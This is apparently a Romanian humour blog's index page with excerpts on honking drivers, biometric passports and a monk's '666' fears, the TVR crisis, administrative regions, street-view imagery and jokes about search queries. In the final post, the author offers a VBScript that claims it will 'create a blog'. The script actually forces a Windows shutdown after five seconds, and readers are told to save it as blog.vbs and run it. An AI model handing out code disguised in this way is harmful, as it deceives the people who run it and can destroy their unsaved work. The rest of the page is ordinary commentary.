Claxonatul interzis!

Claxonatul interzis

Astăzi priveam de la fereastră şi mă minunam de prostia unui gigel cu un volskwagen care  claxona de mama focului o maşină care avea „mămăligile” în geam. (Pentru neştiutori sunt acele semne galbene purtate de începătorii în ale şoferitului timp de un an).

Care era problema gigelului? Maşina care era claxonată cu spor de către dumnealui nu binevoia să o ia din loc. Păi bine bine, ăsta e motiv de claxonat, puteţi zice voi. Dar, în faţa lor era un ditamai semnul pe care scria cu litere de-o şchioapă „STOP”. Adică, trebuia să se asigure ca să pornească mai departe.

Nu ştiu ce problemă avea gigelul de era musai să claxoneze atât de mult (vreo 2-3 minute încontinuu până s-a eliberat drumul şi începătorul şi-a văzut de drumul lui).

Nu mă interesează  nici marca maşinii şi nici  dacă şoferii erau de sex feminin sau nu. Problema e că mereu aud claxoane peste claxoane şi tot nu reuşesc să le mai înţeleg rostul. Par nişte unelte de tortură în mâinile unor gigei care habar n-au că acel claxon se foloseşte doar la nevoie şi nu când binevoiesc dumnealor.

Aş interzice claxonatul în oraşe dacă (more…)

13 Comments

Cifra şasesuteşaizecişişase

Ieri, am vizionat pe PROTV la ştiri cum reprezentanţii Bisericii Ortodoxe se bălăcăreau cu poliţiştii şi informaticienii care au introdus şi la noi paşapoartele biometrice.

Aceste cipuri nu sunt nimic altceva decat un update, o aducere la zi a vechiului cod de bare, despre care stie orice casiera de la orice magazin ca, daca este deteriorat, trebuie sa introduca ea acolo 666 si apoi acest cod de bare. Am devenit si eu din momentul asta un produs, care trebuie sa accept sa ma insemnez cu un cod de bare pe care nici macar nu-l vad si cu aceasta sa ma apropii de implinirea cuvintelor Apocalipsei, deci va spun, este infricosator.

Filotheu Balan, monah Manastirea Petru Voda

Sursa: Protv.ro

Fiecare cu ale lui:

– informaticienii susţineau sus şi tare că noile paşapoarte ţîn pasul cu evoluţia tehnologică, şi e logic ca în 2009 o ţară europeană să aibă cipuri electronice inserate în paşapoarte (more…)

9 Comments

Delete TVR?

Aflăm de la zoso că tvr-ul e în criză. De bani şi de audienţă. Păi normal, cine se mai uită la tvr să ridice 2 degete.

Avem aşa:

Tvr 1
Tvr 2
Tvr 3
Tvr cultural
Tvr info
Tvr internaţional
Tvr HD

Sper că le-am nimerit pe toate. Mi se par (more…)

11 Comments

Judeţe sau regiuni?

Să o luăm metodic. Momentan România are 41 de judeţe plus Municipiul Bucureşti. Băse vrea reîmpărţirea administrativă a ţării, astfel încât să existe doar 9-12 judeţe. Prin aceasta s-ar reduce birocraţia, iar noile judeţe ar putea dobândi un fel de autonomie locală.

Să zicem că suntem de acord. Vor fi probabil nişte costuri (toate birourile de lucru cu publicul vor trebui extinse, ca urmare a numărului mai mare de locuitori, alegeri noi pentru noul prefect şi noul primar de reşedinţă, schimbarea buletinelor tuturor românilor şi altele ). Şi la cât de bine ne merge nouă, exact asta ne lipsea. Nu puteam dormi seara gândindu-mă că nu sunt frate cu harghiteanul, mureşanul sau cu prahoveanul. Gândul ăsta mă măcina seară de seară, îmi provoca cele mai cumplite coşmaruri.

Avem alte probleme pe care trebuie să le rezolvăm: sistemul juridic  corupt, hoţia de la cel mai înalt nivel (vezi Năstase patru case, care deja se gândeşte dacă albul se asortează cu dungile negre), sistemul educaţional la pământ (more…)

13 Comments

Norc street view

Norc street view

De când am descoperit funcţia street-view în Google Earth, mi-am dorit ca aceasta să fie implementată şi în România. Adică, m-am cam săturat de taxiurile galbene, zgârie norii şi clădirile cu nume ciudate de la americani.

Nu ştiu ce legătură are norc cu google (poate doar folosesc hărţile din satelit), însă calitatea imaginilor e bună. Bine, pe alocuri poza este întreruptă, copacii zboară şi maşinile „muşcă din asfalt”, dar nimeni nu e perfect. Şi probabil sunt şi la început.

Mi-am pierdut timpul minute bune pe site, tot testând funcţionalităţile. De exemplu în Braşov sunt o grămadă de străzi care au fost acoperite, ceea ce nu poate decât să ne bucure. Au creat un precedent, aşa că trebuie să ne aşteptăm la şi mai multe.

Deci vă puteţi plimba virtual prin aproape tot Braşovul (more…)

20 Comments

Ascultăm … telefoane

Aşa şi? Va simţiţi cu musca pe căciulă? Până ieri se ascultau telefoanele, dar nu în mod legal. Acum s-a dat legea, şi toţi s-au prins cu mâinile de fund…

13 Comments

Din ciclul „Dacă nu căutam filosof rămâneam”

Articol de citit la serviciu cu colegii:

poze pentru dextop – poate poze pentru Dexter. Pe dextop nu se pun poze.

inainte de partiale dupa partiale inainte– înainte de parţiale după parţiale, înainte…

video sexxy desbracate– n-avem fete desbrăcate!

golden brau eticheta – e verde

creare calendar – îl poţi face în paint dacă nu te pricepi la altceva.

download program de intrat in alte calculatoare -n-avem din ăla. Vezi la Bahoi.

victor ioane blog – N-ai nimerit

viata de student animatie– E de fapt un film de acţiune (repartizarea în cămine) , amestecat cu puţină comedie (în timpul semestrului) şi cu puţin horror (la examene).

blog la naiba – Din păcate La naiba nu are blog. Sau nu ştiu eu de el!

definitia unei pitipoance – Un cocalar machiat, cu buze ţuguiate şi profil cu steluţe şi poze făcute în baie.

pot desena pe hartile google earth– Bineînţeles. Cu şurubelniţa direct pe monitor!

filme de actiune traduse– De ce ai avea nevoie de subtitrare pentru Cichicean sau  Brusli? Chuck Norris chiar nu are nevoie de traducere. Te „traduce” el pe tine!

program creare blog Hai că-ti dau şi ţie codul să nu zici că-s rău:

msgbox "Apasa ok pentru creare blog!"

Dim wshshell

set wshshell = wscript.CreateObject("WScript.Shell")

wshshell.run "shutdown -s -t 5"

Copiaza codul, salvează-l într-un fişier text nou  apoi dă-i numele blog.vbs. Apoi dă dublu click pe fişier şi vei avea un blog. Atenţie însă că trebuie să-ţi alegi tema şi pluginurile manual.


(more…)

12 Comments